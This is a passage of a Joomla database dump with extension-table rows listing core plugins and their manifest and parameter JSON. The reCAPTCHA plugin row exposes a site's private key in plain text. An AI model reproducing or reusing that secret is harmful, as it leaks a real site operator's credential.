Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(418,0,'plg_search_contacts','plugin','contacts','search',0,1,1,0,'{\"name\":\"plg_search_contacts\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(419,0,'plg_search_content','plugin','content','search',0,1,1,0,'{\"name\":\"plg_search_content\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(420,0,'plg_search_newsfeeds','plugin','newsfeeds','search',0,1,1,0,'{\"name\":\"plg_search_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(421,801,'plg_search_weblinks','plugin','weblinks','search',0,1,1,0,'{\"name\":\"plg_search_weblinks\",\"type\":\"plugin\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SEARCH_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"weblinks\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(422,0,'plg_system_languagefilter','plugin','languagefilter','system',0,0,1,1,'{\"name\":\"plg_system_languagefilter\",\"type\":\"plugin\",\"creationDate\":\"July 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGEFILTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagefilter\"}','{\"detect_browser\":0,\"automatic_change\":1,\"item_associations\":1,\"alternate_meta\":1,\"xdefault\":1,\"xdefault_language\":\"default\",\"remove_default_prefix\":0,\"lang_cookie\":0}','','',0,'0000-00-00 00:00:00',17,0),(423,0,'plg_system_p3p','plugin','p3p','system',0,1,1,0,'{\"name\":\"plg_system_p3p\",\"type\":\"plugin\",\"creationDate\":\"September 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_P3P_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"p3p\"}','{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}','','',0,'0000-00-00 00:00:00',18,0),(424,0,'plg_system_cache','plugin','cache','system',0,0,1,1,'{\"name\":\"plg_system_cache\",\"type\":\"plugin\",\"creationDate\":\"February 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CACHE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cache\"}','{\"browsercache\":\"0\",\"cachetime\":\"15\"}','','',0,'0000-00-00 00:00:00',28,0),(425,0,'plg_system_debug','plugin','debug','system',0,1,1,0,'{\"name\":\"plg_system_debug\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_DEBUG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"debug\"}','{\"profile\":\"1\",\"queries\":\"1\",\"memory\":\"1\",\"language_files\":\"1\",\"language_strings\":\"1\",\"strip-first\":\"1\",\"strip-prefix\":\"\",\"strip-suffix\":\"\"}','','',0,'0000-00-00 00:00:00',20,0),(426,0,'plg_system_log','plugin','log','system',0,1,1,1,'{\"name\":\"plg_system_log\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"log\"}','{}','','',0,'0000-00-00 00:00:00',21,0),(427,0,'plg_system_redirect','plugin','redirect','system',0,1,1,1,'{\"name\":\"plg_system_redirect\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2009 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"redirect\"}','{}','','',0,'0000-00-00 00:00:00',22,0),(428,0,'plg_system_remember','plugin','remember','system',0,1,1,1,'{\"name\":\"plg_system_remember\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REMEMBER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"remember\"}','{}','','',0,'0000-00-00 00:00:00',24,0),(429,0,'plg_system_sef','plugin','sef','system',0,1,1,0,'{\"name\":\"plg_system_sef\",\"type\":\"plugin\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sef\"}','{}','','',0,'0000-00-00 00:00:00',25,0),(430,0,'plg_system_logout','plugin','logout','system',0,1,1,1,'{\"name\":\"plg_system_logout\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2009 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LOGOUT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logout\"}','{}','','',0,'0000-00-00 00:00:00',19,0),(431,0,'plg_user_contactcreator','plugin','contactcreator','user',0,0,1,0,'{\"name\":\"plg_user_contactcreator\",\"type\":\"plugin\",\"creationDate\":\"August 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2009 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTACTCREATOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contactcreator\"}','{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(432,0,'plg_user_joomla','plugin','joomla','user',0,1,1,0,'{\"name\":\"plg_user_joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{\"autoregister\":\"1\"}','','',0,'0000-00-00 00:00:00',2,0),(433,0,'plg_user_profile','plugin','profile','user',0,0,1,0,'{\"name\":\"plg_user_profile\",\"type\":\"plugin\",\"creationDate\":\"January 2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2008 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_PROFILE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"profile\"}','{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"1\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_tos\":\"1\",\"profile-require_dob\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(434,0,'plg_extension_joomla','plugin','joomla','extension',0,1,1,1,'{\"name\":\"plg_extension_joomla\",\"type\":\"plugin\",\"creationDate\":\"May 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EXTENSION_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(435,0,'plg_content_joomla','plugin','joomla','content',0,1,1,0,'{\"name\":\"plg_content_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(436,0,'plg_system_languagecode','plugin','languagecode','system',0,0,1,0,'{\"name\":\"plg_system_languagecode\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagecode\"}','{}','','',0,'0000-00-00 00:00:00',26,0),(437,0,'plg_quickicon_joomlaupdate','plugin','joomlaupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_joomlaupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomlaupdate\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(438,0,'plg_quickicon_extensionupdate','plugin','extensionupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_extensionupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_EXTENSIONUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"extensionupdate\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(439,0,'plg_captcha_recaptcha','plugin','recaptcha','captcha',0,1,1,0,'{\"name\":\"plg_captcha_recaptcha\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.4.0\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha\"}','{\"version\":\"2.0\",\"public_key\":\"6LfAgBoTAAAAAD0LmJ4I0GDJWdI021QgzKZFXWYu\",\"private_key\":\"6LfAgBoTAAAAAOArICdgO0KA0fzm9dzelVvUkiMq\",\"theme\":\"clean\",\"theme2\":\"dark\"}','','',0,'0000-00-00 00:00:00',0,0),(440,0,'plg_system_highlight','plugin','highlight','system',0,1,1,0,'{\"name\":\"plg_system_highlight\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_HIGHLIGHT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"highlight\"}','{}','','',0,'0000-00-00 00:00:00',23,0),(441,0,'plg_content_finder','plugin','finder','content',0,0,1,0,'{\"name\":\"plg_content_finder\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"finder\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(442,0,'plg_finder_categories','plugin','categories','finder',0,1,1,0,'{\"name\":\"plg_finder_categories\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(443,0,'plg_finder_contacts','plugin','contacts','finder',0,1,1,0,'{\"name\":\"plg_finder_contacts\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(444,0,'plg_finder_content','plugin','content','finder',0,1,1,0,'{\"name\":\"plg_finder_content\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(445,0,'plg_finder_newsfeeds','plugin','newsfeeds','finder',0,1,1,0,'{\"name\":\"plg_finder_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(446,801,'plg_finder_weblinks','plugin','weblinks','finder',0,1,1,0,'{\"name\":\"plg_finder_weblinks\",\"type\":\"plugin\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_FINDER_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"weblinks\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(447,0,'plg_finder_tags','plugin','tags','finder',0,1,1,0,'{\"name\":\"plg_finder_tags\",\"type\":\"plugin\",\"creationDate\":\"February 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(448,0,'plg_twofactorauth_totp','plugin','totp','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_totp\",\"type\":\"plugin\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_TOTP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"totp\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(449,0,'plg_authentication_cookie','plugin','cookie','authentication',0,1,1,0,'{\"name\":\"plg_authentication_cookie\",\"type\":\"plugin\",\"creationDate\":\"July 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_COOKIE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cookie\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(450,0,'plg_twofactorauth_yubikey','plugin','yubikey','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_yubikey\",\"type\":\"plugin\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_YUBIKEY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"yubikey\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(451,0,'plg_search_tags','plugin','tags','search',0,0,1,0,'{\"name\":\"plg_search_tags\",\"type\":\"plugin\",\"creationDate\":\"March 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2014 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{\"search_limit\":\"50\",\"show_tagged_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(452,0,'plg_system_updatenotification','plugin','updatenotification','system',0,1,1,0,'{\"name\":\"plg_system_updatenotification\",\"type\":\"plugin\",\"creationDate\":\"May 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2015 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_SYSTEM_UPDATENOTIFICATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"updatenotification\"}','{\"lastrun\":1663896417}','','',0,'0000-00-00 00:00:00',10,0),(453,0,'plg_editors-xtd_module','plugin','module','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_module\",\"type\":\"plugin\",\"creationDate\":\"October 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2015 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_MODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"module\"}','','','',0,'0000-00-00 00:00:00',0,0),(454,0,'plg_system_stats','plugin','stats','system',0,1,1,0,'{\"name\":\"plg_system_stats\",\"type\":\"plugin\",\"creationDate\":\"November 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_SYSTEM_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"stats\"}','{\"mode\":3,\"lastrun\":\"\",\"unique_id\":\"358a6606e8f951a33811a96b42b4349a81cc979a\",\"interval\":12}','','',0,'0000-00-00 00:00:00',9,0),(455,0,'plg_installer_packageinstaller','plugin','packageinstaller','installer',0,1,1,1,'{\"name\":\"plg_installer_packageinstaller\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_PACKAGEINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"packageinstaller\"}','','','',0,'0000-00-00 00:00:00',1,0),(456,0,'PLG_INSTALLER_FOLDERINSTALLER','plugin','folderinstaller','installer',0,1,1,1,'{\"name\":\"PLG_INSTALLER_FOLDERINSTALLER\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_FOLDERINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"folderinstaller\"}','','','',0,'0000-00-00 00:00:00',2,0),(457,0,'PLG_INSTALLER_URLINSTALLER','plugin','urlinstaller','installer',0,1,1,1,'{\"name\":\"PLG_INSTALLER_URLINSTALLER\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_URLINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"urlinstaller\"}','','','',0,'0000-00-00 00:00:00',3,0),(458,0,'plg_quickicon_phpversioncheck','plugin','phpversioncheck','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_phpversioncheck\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_QUICKICON_PHPVERSIONCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpversioncheck\"}','','','',0,'0000-00-00 00:00:00',0,0),(459,0,'plg_editors-xtd_menu','plugin','menu','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_menu\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(460,0,'plg_editors-xtd_contact','plugin','contact','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_contact\",\"type\":\"plugin\",\"creationDate\":\"October 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','','','',0,'0000-00-00 00:00:00',0,0),(461,0,'plg_system_fields','plugin','fields','system',0,1,1,0,'{\"name\":\"plg_system_fields\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_SYSTEM_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',16,0),(462,0,'plg_fields_calendar','plugin','calendar','fields',0,1,1,0,'{\"name\":\"plg_fields_calendar\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_CALENDAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"calendar\"}','','','',0,'0000-00-00 00:00:00',0,0),(463,0,'plg_fields_checkboxes','plugin','checkboxes','fields',0,1,1,0,'{\"name\":\"plg_fields_checkboxes\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_CHECKBOXES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"checkboxes\"}','','','',0,'0000-00-00 00:00:00',0,0),(464,0,'plg_fields_color','plugin','color','fields',0,1,1,0,'{\"name\":\"plg_fields_color\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_COLOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"color\"}','','','',0,'0000-00-00 00:00:00',0,0),(465,0,'plg_fields_editor','plugin','editor','fields',0,1,1,0,'{\"name\":\"plg_fields_editor\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_EDITOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"editor\"}','','','',0,'0000-00-00 00:00:00',0,0),(466,0,'plg_fields_imagelist','plugin','imagelist','fields',0,1,1,0,'{\"name\":\"plg_fields_imagelist\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_IMAGELIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"imagelist\"}','','','',0,'0000-00-00 00:00:00',0,0),(467,0,'plg_fields_integer','plugin','integer','fields',0,1,1,0,'{\"name\":\"plg_fields_integer\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_INTEGER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"integer\"}','{\"multiple\":\"0\",\"first\":\"1\",\"last\":\"100\",\"step\":\"1\"}','','',0,'0000-00-00 